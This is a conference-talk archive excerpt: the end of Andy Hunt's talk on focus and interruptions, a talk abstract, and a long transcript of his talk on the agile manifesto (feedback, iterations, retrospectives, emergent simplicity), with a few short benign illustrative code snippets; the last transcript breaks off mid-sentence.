You see them standing there. You've got about a second and a half. So you finish typing what it is you want to do when you come back. Finish adding the exception handler. Add this to the database. Whatever it is. It doesn't have to be English, but something you can recognize when you come back. A little note to yourself. Right there in the code. Just blah, blah, blah. Here's what I need to do. Bang. Yes, what is it? Okay. We have to do this. Da, da, da, da, we do this. We come back. What the hell was I working on? Oh, yeah, it was this file. That's right. Oh, I got to add the thingy. Okay. Bang. You have facilitated that task resumption by leaving yourself a cue. Researchers have claimed great results with this; it's quite effective.
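A minimal sketch of what such a resumption cue might look like, left right in the source; the function, the fix it describes, and the test named in the comment are all made up for illustration:

    import csv

    def import_orders(path):
        # RESUME HERE: wrap the open() in try/except FileNotFoundError,
        # log the error and return [] -- then re-run test_import_missing_file
        with open(path, newline="") as f:
            return [row for row in csv.DictReader(f)]

The cue costs about a second and a half to type, and it's the first thing you see when you sit back down.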
On a larger scale, set the interruption protocols for the team. When is it okay for your team members to interrupt you? When is it not? Do you put a little figure up on your desk saying, I can't be interrupted right now? I've got the Darth Vader up? Do you set hours during the day? You know, as a team, we will not do email on Tuesdays and Thursdays. Or we will only do email from one to four or whatever it is. I don't care. Pick something. But set that so everyone knows the rules and you have your uninterrupted time. But the biggest thing you can do if you haven't done it already, if you want a productivity gain of 20 to 30% without learning anything, get a second monitor. Why is that? What do you call Alt Tab on Windows? Context switch. What do we say about context switching? Yeah, that's bad. Your brain's not good at it. That's horrible. You need the extra real estate so you can have everything all at once. I have Spaces on the Mac. There are equivalents for Windows. I set up different sets of screens, and it's all task based. So all my communications are in one, coding in another. You know, some other business functions in the others. I actually run dual screens, dual headed, so I can have sets of these things going on. It looks something like that. You can get the same thing for Windows; it's called Finestra Virtual Desktops. Same kind of idea. But the idea is if you're working on one thing, that's all you want to be bothered with. You don't want the other stuff interrupting you. So, to sum up, this all sounds great. Oh, I'm going to start mind mapping. I'm going to go tell my team to piss off on Tuesdays. I'm going to do this. I'm going to do that. Yeah, yeah, that's great. It's going to be harder than that. So have a plan for what you want to do. Don't worry about doing something wrong. Worry about not doing something. And realize that habits take time to form. Realize that what you believe about your brain will make it so, because it's going to rewire itself that way, and take small steps. That's all I have for you today. This is my email address, my Twitter handle, my blog where I rant on these things. Most of this material can be found in the Pragmatic Thinking and Learning book. Here's the other six that I wrote. Thank you so much for having me here today. Now, before you go, I am bidden to remind you to evaluate this session with a green card in the bucket. There's some other colors too, but you want to put the green card in the bucket. If you want to, you can add feedback, or comments can be written on the cards. They're a little small, so you'll have to write tiny. Great's a good comment. Do that, throw it in the bucket. I've got two other talks today. Not the next session, but the session after that. I'll be talking about bugs in processing, bugs in your mind, which is kind of interesting. And then later on this afternoon, I've got a talk on what the last 10 years of Agile have and haven't done for us. Hope you all have a great conference. Thanks.
|
Software development happens in your head; not in an editor, IDE, or design tool. But how can you mine the best ideas your mind comes up with? Join Andy Hunt to find out how to grow your brain, take advantage of different processing styles such as synthesis vs. analysis, sequential processing and pattern-matching, and learn new techniques for generating great ideas and harvesting internal clues. Finally, you'll discover one simple habit that separates the geniuses from the "wanna-bes."
|
10.5446/51541 (DOI)
|
Dynamite. Okay, fun. It always reminds me of that old phone commercial where the guy walks around and goes, can you hear me now? Except now it's, yes, I can hear you now, and I've got a copy. But... Alrighty, so, I would like to talk for a while about agility and the agile manifesto, which I was fortunate enough to be involved with some 12 years ago, this last February. Before I get into that, I want to set the groundwork a little bit and mention something I had mentioned in one of my earlier talks today about the importance of context. If I ask you to think of a tree, or to draw a tree, this is likely what you would think of, just an isolated object kind of sitting there by itself. But in reality, there's a lot more going on. A tree is really a system of things. In fact, it's several systems of things. You've got this whole system of respiration and the leaves and CO2 and all this kind of stuff. You've got the whole system with the roots and the soil and the Krebs cycle and nitrogen and all these things that I don't remember from biology, but they're there. So one thing we always try to do when we're looking at code or teams or projects or anything really, is to learn to think of it in context, in terms of it being an active moving system, not just some thing sitting there. It's an actual system. And the reason you want to do this, if you take something out of context to look at it or study it or work on it, you lose a lot of nuance. You lose a lot of information. It's a lossy kind of a transformation. For instance, if you were in a, I don't know, a doctor's office maybe or a bank and they had a sign saying free candy, well that would mean one thing. But if you saw it on the side of what we affectionately call a kidnapper van, that kind of takes on a little different meaning out of context. Similarly, talking about tools, an axe is a very fine tool. We had a neighbor just the other day take a tree down with one, nothing wrong with it. But if you're going to go hitchhiking, probably not something you want to carry with you. That sends the wrong message. And then there's some things that just by virtue of the model, you kind of lose the sense of what you're talking about. So I'm sure all of you probably in school at some point had to build a model of the solar system. Whether it was with oranges and grapes or clay or something, you build the model of the solar system and all the planets go around each other and that's great. Except that's not really what it looks like. And there's this great animation online that suggests that it's much more of a vortex model. Because the planets are going around the sun and the sun is whipping around, like Bob said in his talk the other day, what you really have is this vortex model. And the whole thing is shuttling through space. And it's interesting to me because that gives really a different flavor to the solar system. It's not like you're stuck on this planet and you're just going around in circles and each year you come back to the same old spot again. No, we're going places. I don't know where, but we're going places. So great sense of movement there. But just by looking at that model in a slightly different way, it really gives you a different sense. So back in February of 2001, some 17 of us who were interested in software development happened to get together in Snowbird, Utah. Somehow Alistair Cockburn picked the place because he lives there and he likes to ski.
Why we didn't go to, like, the Caribbean, I don't know. That was a failure, an early failure on our part, I think. So we got together and we talked about software and developing these sorts of things and it ended up being a fairly momentous occasion in software development. Unfortunately, in September of 2001, there was another sort of momentous occasion that captured headlines the world over. So 10 years, about 10, 11 years after that, when they finally caught up to Osama bin Laden and took him out, the trending tweet on Twitter at the time from teenagers was, who is Osama bin Laden? Wow, 10 years. Just 10 years and you've got kids tweeting, who is Osama bin Laden? Why is it important we killed him? Is he in a band? And get off my lawn. 10 years. And you forget. You know, monumental, pivotal things like this. So it is understandable that in the intervening 10 years we might have forgotten some of the things about agility, some of the things we were talking about at the time. So that's what I want to kind of broach on today, kind of talk about. If you go to agilemanifesto.org, there's this marvelous picture in the background faded up. That right there is indeed the back of my head. See the resemblance. So I was digging through this as the 10th anniversary came up and I noticed something that I think, you know, first thing that tends to get forgotten. What's the very first line of the preamble here? We are uncovering better ways. We don't know the better ways. This is not the ultimate list of the best way. We're figuring this out. We're still figuring this out. We've been figuring these things out since 1945, 1947. We're still working on it. It is not the end of the road by any means. So what is agility? Well, first I just want to pull up this Charles Darwin quote because I think he's really close to the heart of it here. He points out that it's not strength that guarantees survival. It's not intelligence that guarantees survival. Those are both helpful. Love them both to death. Wonderful things. But that's not going to make the difference. It's adaptability. That's what guarantees your survival. And really that's what agile is all about. Kent Beck's first book on XP. What was the subtitle? Embrace change. Right? Embrace change. Not tolerate change and grit your teeth. Because that's how we usually do it. But embrace change. And embrace uncertainty armed with working software. Stuff that actually runs and does its thing. So back in February 12th, sorry the date's backwards, back on February 12th, 2001, we got together and we didn't even know what to call the stuff we were working on, the stuff we were thinking about. So we booked it as the lightweight methods conference. Lightweight wasn't a particularly, that term didn't last long because it sounded like you were in a lightweight class and the heavyweight was going to come and clean your clock any second now. So that was not a great idea. But we bandied about some other names. Agile, resilient. Nowadays maybe anti-fragile. That's probably actually really close to it if you read the book about that. Dynamic, interactive as opposed to static and batch. Interesting way of thinking about it. That's a little closer. I think almost any of those probably would have been better than agile. But you know, that's the way it goes. I think agile somehow gave people the wrong idea. So I like to think of it more as adaptable or interactive or dynamic, something like that.
Anyway, other than picking a name, a lot of what we were talking about wasn't particularly new. Even stuff that was very contentious at the time like Kent Beck's extreme programming, pair programming technique, right? That dates back at least to these fellows. They're pair programming. It wasn't all that new. So we got together for the anniversary a year or two ago and I'm looking through my notes and I realized back at the original meeting we didn't discuss practices. We didn't discuss refactoring or pair programming or unit testing or any of these sorts of things. And maybe we should have. At the time, even version control wasn't really universally adopted. I could go to halls like this and say, you know, raise your hand if at work you do not have version control. You've got one big shared disk. Everyone writes to it and the last one in wins. And about a third of the audience would embarrassedly raise their hand and admit to it. No one admits to that now. Because they're using something, they're using SourceSafe or Subversion or Git, something or other. But this wasn't even a topic of discussion. It was like, yeah, yeah, yeah, you got some practices, fine. That's not what we were interested in. What was more interesting was what was this thing that we were trying to talk about? What did we mean by agile? So let me turn that around and ask you a question.
As soon as something on an agile project sounds like you've got a plan coming up, be concerned. That might not be the right way to go about it. In a similar vein, when I was doing the Pragmatic Thinking and Learning book, I came across this marvelous book by Dr. Patricia Benner from Novice to Expert. And this describes, among other things, the dryfus model of skill acquisition and how you grow from Novice to Expert in a particular skill. And one of the things she notes, talking about formal practices and documenting best practices and this sort of thing, she notes that practices can never be completely objectified or formalized because they must be worked out anew in particular relationships and in real time. In other words, in context. Just like I started off talking about the tree and the crazy guy with the ax and whatnot. You take something out of context, it doesn't mean the same thing. When someone says, oh, this is a best practice, I laugh at them. Ha, ha, right in their face, right? Best practice for who? Under what circumstances? By whom? For whom? Who does it benefit? I mean, you know, there's a thousand questions that go with that. There's no such thing as a best practice. That's that somebody's trying to sell you something when they do that. That does not work. So, all right, well, this is kind of close. None of this really sort of defines agility, though. These are some nice quotes and some nice ideas. So, back when I was writing the book Practices of an Agile Developer with Venkat, Supermoneyim, who's here at the conference this week. Great speaker. Hope you had a chance to hear him. We were writing this book on Agile Practices and we needed, there was a blank spot, there was a place on the page, we needed a definition. So, I came up with this. Agile Development uses feedback to make constant adjustments in a highly collaborative environment. That's pretty close to what it is. That's what you want to do. You want some place where you're getting feedback all the time from everything, from every action, making adjustments based on it, and collaborating with everybody involved. All right, that's pretty straightforward. Why that definition? Well, one of the things, going back to context, one of the things we were trying to prevent was any variation of this scenario where you have a big plan and a mighty heroic act, some lengthy wait to see if it worked or not and get the feedback, sliding inexorably into the inevitable panic, finger pointing, blaming, bankruptcy, you know, all those things at the end of the line there. That's what we do not want to see on a big scale, certainly, but even on the small scale. You know, we're planning for a big meeting next week. Everyone's going to be there. It's going to be this big thing and, you know, for whatever reason, we're going to wait a while later and do this and that. But, didn't know, big anything, bad idea, something's wrong there. So, instead of this, what we want to see is something like this. Do something. Gather feedback from it in real time and in the real world. Not just Fred said it was okay. My boss liked it, but you get real feedback under actual conditions in real time if you can. Correct what you need to correct. Rinse, lather, repeat. Do it again and again. Notice this starts with do. This doesn't start with plan or theorize or think about it. You got to have something to work with before you can get feedback. So, you do first and then work with it. One of the analogies we used to use talks about firepower. 
In the old days, you could have something like a big, I don't know what you call it, a howitzer or a cannon or whatever. These giant guns were very much what we would call plan based. You have to like measure the distance to target, compensate for the wind and the azimuth and the range and the whatnot. You plug all this into a firing computer or firing tables in the old days and you crank the thing, crank the thing, load it, fire it. And if the thing you're shooting at is any more mobile than a city, it's gone. It's out of there. No chance whatsoever. If you're shooting at cities, dynamite. And this is waterfall. This is waterfall process. If your target is big and slow moving, bless your heart, that'll work. Go for it. Dynamite. Unfortunately, most of our targets are a little more nimble these days and that's not the approach that's going to work. So, we've always liked the analogy of tracer rounds, tracer bullets. And the idea with tracers is you take a belt of ammunition and every so often replace a round with a phosphor tip, and you get these streaks of light through the sky where your ordnance is landing in real time under real conditions. So, I don't care how fast the wind is blowing or if gravity is more or less here than it was somewhere else or what my distance to target is or what not, I can see where it's landing. I can adjust in real time even if the target's moving because I've got real time feedback. I can adjust even if the target is moving. That's what you want in an agile project. So, one of the things that we've long suggested is the very first thing you do, the first iteration, is try to get a thin thread of execution from one end of the project to the other. From your iPhone or your web client or whatever through middleware, through this stack, through the database, through whatever else you got plugged in, have everything plugged together even if it's just as simple as hello world, have that level of sophistication, which isn't much, but you have it from end to end fully. Now you know all the parts talk to each other. That alone can save you millions. Believe me, I was there. So were you, probably.
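To make that concrete, here is a minimal sketch of what such a first hello-world thin thread might look like, using nothing but the Python standard library; the greeting table stands in for the real database, the single handler stands in for the real middleware, and every name in it is made up for illustration:

    import sqlite3
    from http.server import BaseHTTPRequestHandler, HTTPServer

    # "Database" tier: an in-memory table holding one row.
    db = sqlite3.connect(":memory:", check_same_thread=False)
    db.execute("CREATE TABLE greeting (text TEXT)")
    db.execute("INSERT INTO greeting VALUES ('hello world')")

    class ThinThreadHandler(BaseHTTPRequestHandler):
        # "Middleware" tier: one GET handler that touches the database
        # and returns the result to the client, and nothing more.
        def do_GET(self):
            (message,) = db.execute("SELECT text FROM greeting").fetchone()
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(message.encode("utf-8"))

    if __name__ == "__main__":
        # The "client" tier is anything that can hit it, e.g. curl http://localhost:8000/
        HTTPServer(("localhost", 8000), ThinThreadHandler).serve_forever()

It does almost nothing, but every tier is plugged in and talking to the next, which is the whole point.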
To be able to do that, to be able to work this way, you need to be constantly pushing out software that works. You need to be able to deploy, not saying that you will, but you need to be able to deploy a full release at a moment's notice. Every day, any day, multiple times a day. Doesn't matter whether you're printing out these lovely coasters to set your drink on or if you're pushing out to mobile devices or just into the cloud, whatever, the whole goal is to get working software out continuously all the time, however you do it. Why? Because you need that for feedback. You know, they used to say you can't steer if you're not moving. So you got to at least have some velocity going. So I talk about feedback a lot, that's lovely. How do you get real time feedback? Well, some of it's pretty simple. You know, we like to talk about code a lot and certainly getting feedback from unit tests or test driven development, pair programming. These are all ways of getting real time feedback with code, and that's pretty well worn territory. That's pretty obvious, right? But then maybe some less obvious things. How do you get feedback on a design? Try it. Implement it. See how it works. This is one of the, I think, biggest problems in our industry. You know, we need a design, we need an architecture. Okay, bang. Here's the first design that comes off the top of my head. I'm going to do that. And I write it. And there you go. One shot. That was it. Richard Gabriel, who was chief scientist or some exalted title at Sun for a good while before Sun went away, had this marvelous talk where he described the various differences between getting a PhD in computer science from Stanford, respected place, versus getting a lowly master's degree in poetry. And the level of effort, the difference between them, was astonishing. I mean, it made the computer science degree look like a walk in the park. It was nothing. You wrote like a program or two. You read a couple books. You were done. There was nothing to it. The poetry degree, however, that was real work. He had to write a poem a day for something like three years. He had to rewrite a single poem 60 different times, 60 different ways. Can you imagine how great we would be as programmers if for every program you wrote, you even wrote it five different ways? Hell, three. Three would do. Right? Something. It's like, well, I don't know the best way to do this. Let me try a couple. I'll prototype it. Write it in Python or Ruby or something fast. Don't prototype in C++, whatever you do. That's a bad idea. But try it. Prototype it. This is how you get feedback from designs. You have to try it in the real world. See what it's going to do. Learn from it. How do you get feedback from requirements? That's an easy one. Again, well-traveled territory. You have the people who are going to be using it involved as closely as you can, as tightly as you can. Sometimes it's not possible. All right? That happens. The result's not going to be as good. It's just that simple. There's no magic to it. And where possible, you want the real actual users involved, not a proxy. You know, there was a case some years back where they built this whole manufacturing system with this login and everything and didn't realize that the user population was illiterate. They couldn't use it. Because their representatives were like, oh, this is great. We're going to do this. We're going to do that. But they weren't the actual users on the factory floor. They deployed it and, oops, a bit of a problem here. They had to go back and redo the whole UI. Teamwork. How do you get feedback from the team? Two ways, really. You've got the stand-up meeting, a scrum practice where you get everyone together and say what you're doing. That's a wonderful way to get feedback from what's going on. And retrospectives. Not postmortems. What's the problem with a postmortem? The patient's dead. So something like end-of-iteration retrospectives. I'll talk more about that in a minute. So one of the big things is this idea of continuous development, not episodic. You don't want a big episode of everything. You're saying you've got a big episode of testing coming up. Sounds like some kind of medical condition. You don't want to go there. You want a little bit of everything all the time. Never a big lump in the system. So because of that, there we go, you get this kind of sense of cycles and rhythms. You've got your check-in and your local build going fairly constantly, an iteration of a couple of weeks. And don't kid yourselves. An iteration of more than four weeks is not agile. Full stop. It's just not. You're kidding yourself. Less than a week, bless your heart. That'd be hard. I wouldn't want to do that. So a couple of weeks-ish.
And at the end of each iteration, you want to demo and exercise the code. You don't necessarily foist it onto the user population. Some folks make that mistake. They're like, oh, I can't possibly adopt agile because we can't roll it out to the users every month or every couple of weeks. Okay, don't. But you want to be in the position where you could if you had to. And then every couple months, every year, whatever, you do the full release out to the user population. Not a problem. So I've been talking very generally here, and I'll keep doing that because it's not about whether you're doing XP practices or scrum or crystal or anything else. That doesn't really matter. But the things that you probably do want to do is work on this thin thread model that starts off end to end, hello world, nothing more than that. And then you keep growing onto it. You keep accreting and growing sections and adding features and functionality, making it thicker and thicker up to the end of an iteration. If you're falling behind, if something's not going to make it, do you change the date? I find that not helpful. You never ever want to change the date. You want to keep that sense of rhythm going so you keep the date fixed, but you slip the features into the next iteration. That tends to work out pretty well. You want automated builds. I want to be able to build the code exactly the same as Fred does, exactly the same as the server does. That needs to be all automated and consistent. You need eyes on the code. Doesn't matter whether you use pair programming, whether you do code reviews, I don't care what you do, but somehow you need another pair of eyes on every piece of code before it gets checked in. You just do, one way or another. With backlogs, it's helpful to have different people do the prioritization and the estimation. Usually better if you've got the actual team doing the work to do the estimates. Tends to work out better a lot of the time. And you need retrospectives. There's a trick there. A lot of the stuff is like, okay, somebody needs to look at the code. All right, that's fine. There's a bunch of ways you can work that out and you get some benefits. Some will get you more benefit than others, but it's kind of okay. But retrospectives are a little tricky. If you do them the wrong way, you get no value out of it. And the wrong way is everyone gets together after the iteration and it's like, hey, gang, how did it go? Great. Okay, next. Let me move on. There's a bit of an art to extracting good information from a team on how things are going. And I would highly recommend getting a book on the subject, getting a coach or a mentor or a consultant or something and working with that. We happen to publish a book on the subject. I'll admit it's a really good one. But there's others out there, too. They go through these kinds of consultant tricks with dot votes and index cards and almost party games. These are the kinds of things that extract from the team what's really going on. Because otherwise, it's like if you were a polling organization and you were trying to do research on alcoholism, say, you can't just knock on everyone's door and say, oh, good morning. Are you a drunk? That's not going to work out well. First of all, if you did that at university, you'd get false positives. Oh, yeah, all the time. It's just you're not going to get realistic results that way. So you have to be a little more clever about it. And underneath all that, you just need a solid technological base.
It goes without saying you need version control and tests and automation. I'll say it anyway. But you have that kind of base and then you do this business on top of it. So, all right, straightforward so far. So the key to this is to seek in all cases, whether it's coding, a meeting, whatever, feedback, and then apply it to change anything that needs changing. This is not just about the code. It's the design. It's the architecture. It's the code. It's the product. It's the process. It's the people. It's the management. It's those pesky users. I mean, they're really the heart of the problem, right? Yeah. But whatever it is, if it's causing a problem, that's something you need to address. It doesn't stop at the code. So that's kind of where we were going. Where were we coming from? What sort of things fueled this idea of the agile movement? Well, a lot of it, and I think some parts that we've forgotten, come from actual real science, chaos theory in particular, and also ideas from Kaizen, systems thinking, as I talked about earlier, risk management. I just want to take a quick look at some of these. So one of the ideas that was very popular back at the turn of the century, that sounds horrible, that I think has gotten kind of lost is this idea of functioning at the edge of chaos, you know, living where your seat is tipped back just about where it's going to go. Dee Hock, who founded Visa International, wrote quite a bit on this, and Jim Highsmith was popularizing this for many years. But the idea is that you need enough order, just enough order in your code, your organization, whatever, to generate patterns. And you'll see what he means in just a second. Ed Catmull, who's president of Pixar, you might have heard of them, mildly successful company, he notes that fundamentally successful companies are unstable. Well, that doesn't sound like what we've been doing, does it? We want instability, we want chaos? Goodness gracious, we had enough chaos to start with. How does that work? Well, it's a particular kind. So let me show you this simulation here. This is the Boids simulation. It simulates a flock of birds in flight, and it's really interesting and pretty. You see them, you see that it's like particle animation. You see the swarm separate around an obstacle, reform on the other side. They do all these graceful patterns. It's very lovely. The interesting thing is, there is no code that specifies any of that behavior. The only thing the code says is these three simple rules, separation, alignment, and cohesion. Those three rules are implemented in the simulation, nothing else. The rest of it is emergent behavior. It just happens as a result of the system. And that is magic. That's the kind of magic that we've always wanted to see. We want to be able to see complex behavior emerge from simple interactions. This is why all the agility stuff says you want simple interfaces, simple team interrelationships, simple this, simple that, so that you get complex behavior out of it. The reverse is true. If you have very complicated interactions and complicated rules, like say any country's taxing authority, you get very stupid behavior out the other side. We'd like to avoid that.
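For the curious, here is a minimal sketch of those three rules in Python; the neighbourhood radii and the weights are invented for illustration, and nothing about flocking as such is written down anywhere in it:

    import numpy as np

    N = 50                                     # number of boids
    positions = np.random.rand(N, 2) * 100.0
    velocities = (np.random.rand(N, 2) - 0.5) * 2.0

    def step(positions, velocities):
        new_velocities = velocities.copy()
        for i in range(N):
            offsets = positions - positions[i]
            distances = np.linalg.norm(offsets, axis=1)
            neighbours = (distances > 0) & (distances < 15.0)
            if not neighbours.any():
                continue
            # Rule 1: separation -- steer away from boids that crowd too close.
            too_close = (distances > 0) & (distances < 5.0)
            separation = -offsets[too_close].sum(axis=0)
            # Rule 2: alignment -- nudge toward the average heading of neighbours.
            alignment = velocities[neighbours].mean(axis=0) - velocities[i]
            # Rule 3: cohesion -- drift toward the centre of the local flock.
            cohesion = positions[neighbours].mean(axis=0) - positions[i]
            new_velocities[i] += 0.05 * separation + 0.05 * alignment + 0.01 * cohesion
        # Keep speeds bounded so the flock stays coherent.
        speeds = np.linalg.norm(new_velocities, axis=1, keepdims=True)
        limited = new_velocities * 3.0 / np.maximum(speeds, 1e-9)
        new_velocities = np.where(speeds > 3.0, limited, new_velocities)
        return positions + new_velocities, new_velocities

Run step in a loop and plot the positions: the swirling, flocking patterns are nowhere in the code, they just emerge.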
So, okay, blah, blah, great. Does this really, does anything like this actually work in practice? Yes, in fact it does. Last summer, summer 2012, I had the pleasure of visiting a company in the U.S. that shall remain nameless. They had about 100 or so software developers on staff and no managers. A very small executive team, sort of just enough folks to sign the checks, deal with things that executives need to deal with, but very small, no managers. They don't take attendance. There's no work assignments. It's not saying you're going to work on project A and you're going to work on project B and you're going to work on project C. Instead, when you start up a project, people will come to you and say, hey, that looks interesting. I want to work on that. In fact, that's how it works. You have to have two people minimum to start up a project. So, if it's a really turkey idea and no one else wants to work on it, that gets orphaned pretty early. No one's there. So you start on it, you get some people going, hey, this is gaining traction, a lot more folks are interested. If it's more interesting than what they're working on, maybe you get some defectors going, maybe it grows. Maybe it's not that interesting. And the one person you talked into it says, you know, this sounded more fun on the brochure. I'm out of here. And it dies. One of the only firm rules they have is you got to release stuff. You can't sit there and say, okay, we're doing a six-week architecture spike. No, you're not. That doesn't cut it. You have to release working product early and often so it can be evaluated. This company's value, if you look at a graph, it's like this. The profits, the revenue, their growth, boom, just like that. And I thought, okay, well, that's a wonderful poster boy. So I found out they're not the only one. There's maybe a half dozen other entities, mostly smaller, but doing very similar things and getting the same sort of results. How can that work? It's because they're looking at simplicity not as a goal, but as a tool. Simplicity is a generative tool. And that's what we want to see. From code all the way up through organization, we want to see simple interactions, simple rules that generate rich, complex behavior. That's something we've kind of forgotten about. We've been a little bit better with the ideas from Japanese kaizen, the idea of doing continuous changes based on continuous feedback. We're a little better at that except for two things. We don't always keep track of when things are changing. And when we do, we don't always do anything about it. But other than that, we're pretty good on it. One of the problems is we tend to apply these ideas only to code. And we don't look at the other things that we might be doing in a project as well. So that's something we'd like to see expanded, perhaps. How do you reduce risk? Well, the first primary thing, of course, is take small bites. I've said it a dozen times. I'll say it a dozen more. Nothing should be a high ceremony, one time, big event. It should all be small events all the time. Time-box everything. So what do we mean by time box? Well, you've got the iteration. Okay, that's a time box. What, even small stuff? You know, a meeting comes up. How long is the meeting? Well, until we figure this out. No, it's an hour. After an hour, whatever the best solution is on the table, that's what we're going with. That's a time box. When you're stuck on a bug, how long are you allowed to sit there and be stuck on a bug? That could be a time box. You could set a team-wide rule that says, all right, if I'm working on this, and I'm stuck for more than an hour, I have to go get help. I am in trouble if I don't go get help at this point. That's an interesting way of looking at time box.
Again, doing anything you can to stop something from spiraling out of control and losing control. Now it becomes a big deal. I've been stuck on this for three weeks and I can't fix it. Now we have a problem. If you had looked at this after the first hour, you know what happens when you're stuck on a bug. You call your friend over, they look, they're like, what the hell is that? You're like, oh, and you fix it and life goes on. So there's a lot of things that you can time box that isn't just the iteration. Transparency. We want a general awareness of what everyone's working on because software is so invisible, so intangible. We need to work extra hard at transparency. And you can do things like having information radiators and have a wiki and have the stand-up meeting and whatnot. And that's great. But the best thing, honestly, is to have working software out there all the time. So you can see what's going on. Other people can see: what new toys do I have to play with? What's cool? What's new? What's fixed? What's in there that didn't used to be? You need to do the real retrospectives. As I mentioned, you'll get a book, get some help on it, all for the purpose of eliminating any place where bugs can hide. If you're stuck on a problem, bugs can hide there. If you don't know what Fred's working on, bugs can hide there. If you haven't released product in two weeks, six weeks, bugs are hiding and breeding in there. This is what we want to try to eliminate. And of course, what's the best way to write absolutely provable bug-free software? Don't write it. The line of code that you don't write is guaranteed to be bug-free. So if you want fewer bugs, write less code. And interestingly, as sarcastic as that sounds, and it is a bit, the language that you use has a big impact on that. If you get familiar with something like Clojure or Erlang or Elixir or something like that, you can take what would be thousands and thousands of lines of code and write it in 25 or 100 lines, something much smaller. If you're writing in C++, it goes the other way. Or whatever. I mean, pick a language you want to beat on, but the tool really needs to fit the job. If you're writing systems or driver software, C or C++ is probably what you want to do. If you're writing something else, maybe you want to use this web stack. Maybe you want to use this other language. If you're doing data analysis, maybe you just need to use R. You wouldn't use any of that stuff. It all depends. You want the right tool for the job. So along those lines, come on, you can do it. Maybe you can't do it. All right. There we go. What are some unagile warning signs? I don't know if you can read the cartoon back there, but the dinosaur says, oh, crap, was that today? They missed the boat. We don't want to miss the boat on agility. What do we do? Dan North, who spoke here at this conference. I'm not sure if he's still around, but he had a couple of talks here. He was out consulting for a company a couple of weeks ago. I gathered it wasn't going very well, because he started tweeting some complaints about this group he was working with and how they weren't necessarily grasping this whole agile thing the way maybe they should have. So on the first, the first tweet comes out and Dan tweets and says, all right, agile manifesto line one, people and interactions over processes and tools. And on the first day, the agile team said, which process and tools shall we use? Face palm. Yeah, wrong, wrong, wrong, wrong, wrong, wrong. That's not the first question you ask.
What should be the first question you ask? How will we work together? Right? It's about people. How will we work together? When is it okay for me to interrupt you? When is it okay for you to interrupt me? What is what are our protocols of how we're going to work together? What is our percentage of time on site or off? Can we work remote? Are we not going to do that? Are we going to all work in the bullpen? Are we going to do this? Are we going to do that? How long can we be stuck on a bug without help? All those kinds of questions. That's how we work together. That's people and interactions. God, would you look at that? There it is playing his day. And we don't do that. Have you ever even had that conversation on a team? Yes? Do you consider it that way and do you discuss that at your organization? Good for you. I'm genuinely thrilled. Has anyone else even had that conversation as part of their process? One, two, three, four, five. Okay. Dynamite. But what happens is people tend not to think of it that way. I mean, I agree. In a sense, those kinds of protocols are part of the process. But they're the part of the process that relate directly to the people and the interactions rather than the processes and tools. And that's the point. And that actually brings up an important side point, I think, about the manifesto in general. The fact that it has a left side and a right side. And the idea is that when push comes to shove, we prefer the first things over the second things. It doesn't mean you don't use the second thing. It doesn't mean that you ignore it. It just means that it's less important than the other thing. It's a difference of shifting focus, which brings up the next one quite handily. Working software over comprehensive documentation. This has caused a lot of confusion, I think, in the last decade or so. I've had people come to me and say, oh, look, see, it says right there, agile programmers don't do documentation. It does. I'm sorry. I know I'm getting old and I can't see without my glasses. But would you show me where it says that? That's not what it says. First of all, I would have reworded this completely. I would have said working software over really anything else. That's the ultimate goal because that's the hardest part. But even then, on the second day, this team said, oh, which automated spec framework should we use? Again, unfortunately, focusing on the tool rather than necessarily focusing on, OK, well, how are we going to do the first thing and release? Which is probably a better orientation for a first question. This is a fine question. Yes, at some point you do need to decide what tools you're going to use and what automated spec framework you're going to use. But maybe that's not the first thing you should consider. Day three, customer collaboration over contract negotiation. And the agile team says, how much shall we commit to in this sprint? That just tastes a little funny, doesn't it? I don't see a whole lot of, I mean, it's Twitter. OK, so you got to allow for the fact this is 140 characters and you're losing some nuance and some character here. But I'm not seeing a lot of collaboration there. I'm just not seeing it. And then finally, this is my favorite one, adapting to change over following a plan. And they say, let's build a 200 story backlog and follow it. No, no, that's a plan and not a very good one at that. Which leads us to a couple conclusions, first of all being that my remote is just dead now. All right, fine. Agile cannot fix stupid. 
And it wasn't ever intended to. And that's an actual thing. Don't hold chainsaw by the wrong end. OK, not more than once, certainly. It was never designed to fix stupid. Again, going back to context, the whole agile thing was designed for taking talented, skilled programmers and put them in the most frictionless environment you can come up with to get something out the door. That's what it's designed for. But notice it says you need fairly talented people to do this. Yes, you do. You need them to do anything, really, of consequence. Capers Jones, who writes and researches on this a lot, came up with the first edition of his software assessments and best practices. God help us. Back in 2000, big thick doorstop of a book. It's two and a half, three inches thick, maybe, back when they used paper, you know, for books. And he goes through and he studied something like, I'm going to say, 9,000 projects across 600 or 700 companies. Big department of defense, you know, build a battleship kind of projects down to one guy in his garage stamping out games. You know, wide swath of different things that fall under what we call software development. And he came up with, OK, you know, this stuff seemed to help this stuff, didn't all these best practices and sorted. But right in the very preface, he says, you know what, none of that really matters. He says, even without excellent personnel, even a good to an excellent process will only achieve marginal results. And he actually quantified this with some graphs. He said, if you've got better than average staff, you get something like a 40-odd percent boost in productivity. But you get like a 90 percent hit if they're below average. So you actually get, take a worst hit from unskilled staff than you get as a boost from skilled staff. And the effect is magnified with a manager. If you've got an unskilled manager, unskilled at management, that drags the team down close to 100 percent. Just food for thought there. Which is a problem, of course, because, as I mentioned in my second talk today, we tend to think of ourselves pretty highly. We think of ourselves as being logical and rational, you know, from hanging around computers so much. But actually, of course, the model of our thinking and rationality is closer to the gibbering monkey. Now I can tell who was at the earlier talk because they ain't laughing again. They saw it the first time. And so, you know, I went through a whole bunch of cognitive biases. There's 90 common ones that people suffer from. But one or two in particular really affect agile adoption. And one of them is this need for closure. Dilbert tells us, I didn't have any accurate numbers, so I just made up this one. Studies have shown that accurate numbers aren't any more useful than the ones you made up. How many studies showed that? 87. And this is killer. And this happens all the time because, you know, somebody somewhere in the chain of command says, I need to know how much this project is going to cost and when it's going to be done. And you give the agile response and say, well, we don't know yet. We're working on it. We've got the velocity to blah, blah, blah, blah, blah. No, you don't understand. I've got a form to fill out and I need to put that number in it. I need the number. Oh, fine, 87. Okay. There it goes. This is a huge and horrible pressure because what happens on a team, on a project is, you know, when do you know the least about any software project, right? The day it starts. Hey, guys, we're going to build this thing. 
